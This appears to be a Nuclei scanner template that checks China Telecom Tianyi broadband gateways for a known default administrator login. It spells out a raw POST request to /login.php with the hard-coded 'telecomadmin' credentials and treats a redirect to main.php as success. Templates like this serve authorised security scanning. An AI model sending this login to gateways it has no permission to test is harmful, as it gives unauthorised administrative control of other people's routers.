id: telecom-epon-login

info:
  name: 中国电信天翼宽带网关默认口令
  author: Str1am
  severity: high
  tags: telecom,login

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        user_name=telecomadmin&password=nE7jA%255m&login=%E7%99%BB%E5%BD%95&navigator=&lang=1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "main.php"
        part: body
        condition: and